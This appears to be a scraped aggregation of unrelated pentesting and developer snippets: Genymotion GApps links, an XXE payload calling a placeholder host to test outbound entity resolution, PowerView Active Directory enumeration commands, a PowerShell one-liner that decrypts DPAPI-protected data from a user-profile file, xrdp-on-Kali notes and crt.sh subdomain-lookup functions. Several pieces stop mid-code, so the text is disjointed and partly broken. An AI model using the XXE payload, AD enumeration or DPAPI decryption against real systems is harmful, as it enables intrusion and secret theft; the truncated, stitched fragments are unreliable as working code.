Ronnie Flathers ropnop

Building

go build -o goencrypt main.go

Stop! This text is only interesting for you if you...

	NOTE: Easier way is the X86 way, described on https://www.genymotion.com/help/desktop/faq/#google-play-services

	Download the following ZIPs:

	ARM Translation Installer v1.1 (http://www.mirrorcreator.com/files/0ZIO8PME/Genymotion-ARM-Translation_v1.1.zip_links)

	Download the correct GApps for your Android version:
	Google Apps for Android 6.0 (https://www.androidfilehost.com/?fid=24052804347835438 - benzo-gapps-M-20151011-signed-chroma-r3.zip)
	Google Apps for Android 5.1 (https://www.androidfilehost.com/?fid=96042739161891406 - gapps-L-4-21-15.zip)
	Google Apps for Android 5.0 (https://www.androidfilehost.com/?fid=95784891001614559 - gapps-lp-20141109-signed.zip)

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>

	# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
	# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

	# get all the groups a user is effectively a member of, 'recursing up'
	Get-NetGroup -UserName <USER>

	# get all the effective members of a group, 'recursing down'
	Get-NetGroupMember -GoupName <GROUP> -Recurse

	# get the effective set of users who can administer a server

	// quite untested, adapted from BigstickCarpet's gist, attempt to make it simpler to use

	function openIndexedDB (fileindex) {
	// This works on all devices/browsers, and uses IndexedDBShim as a final fallback
	var indexedDB = window.indexedDB \|\| window.mozIndexedDB \|\| window.webkitIndexedDB \|\| window.msIndexedDB \|\| window.shimIndexedDB;

	var openDB = indexedDB.open("MyDatabase", 1);

	openDB.onupgradeneeded = function() {
	var db = {}

	Setting up xrdp on Kali Linux 2016.2 on AWS

	AWS has an AMI for Kali 2016.2, but being remote, you need VNC or RDP to access the graphical tools.

	VNC is easy to set up but very restrictive. RDP is harder to set up, but easier to use. These are the instructions I use to set up xrdp.

	I use this config so that I connect to the Kali VM through an Apache Guacamole RDP proxy. This keeps Kali behind the firewall and in my pentesting lab. Guacamole also allows me to access the Kali box on SSH or RDP via a web interface from anywhere and any device.

	OS: Kali Linux 2016.2
	AMI: Updated 19 Oct 2016

	Add-Type -AssemblyName System.Security;
	[Text.Encoding]::ASCII.GetString([Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String((type -raw (Join-Path $env:USERPROFILE foobar))), $null, 'CurrentUser'))

	# twitterfavlinks.py - Throw back all your favorites that contain a url. Get any applicable redirects. Note there are Twitter API
	# limits, so if you have a gazillion favorites, you probably won't get them all. YMMV
	#
	# Author: @curi0usJack
	#
	# Dependencies:
	# Tweepy: sudo pip install tweepy
	# Twitter API access. Set up here: https://apps.twitter.com/

	import tweepy

	#!/bin/bash
	# Add these functions to your .bashrc or .zshrc and use from your terminal.

	get_certs_domains() {
	# Credit goes to Ronnie Flathers, taken from https://twitter.com/ropnop/status/972151279463124994
	curl -s https://crt.sh\?q\=%25.$1 \| awk -v pattern="<TD>.$1" '$0 ~ pattern {gsub("<[^>]>","");gsub(//,""); print}' \| sort -u
	}
	get_certs() {
	curl -s https://crt.sh\?q\=%25.$1 \| awk '/\?id=[0-9]/{nr[NR]; nr[NR+1]; nr[NR+3]; nr[NR+4]}; NR in nr' \| sed 's/<TD style="text-align:center"><A href="?id=//g' \| sed 's#">[0-9]</A></TD>##g' \| sed 's#<TD style="text-align:center">##g' \| sed 's#</TD>##g' \| sed 's#<TD>##g' \| sed 's#<A style=["a-z: ?=0-9-]*>##g' \| sed 's#</A>##g' \| sed 'N;N;N;s/\n/\t\t/g'
	}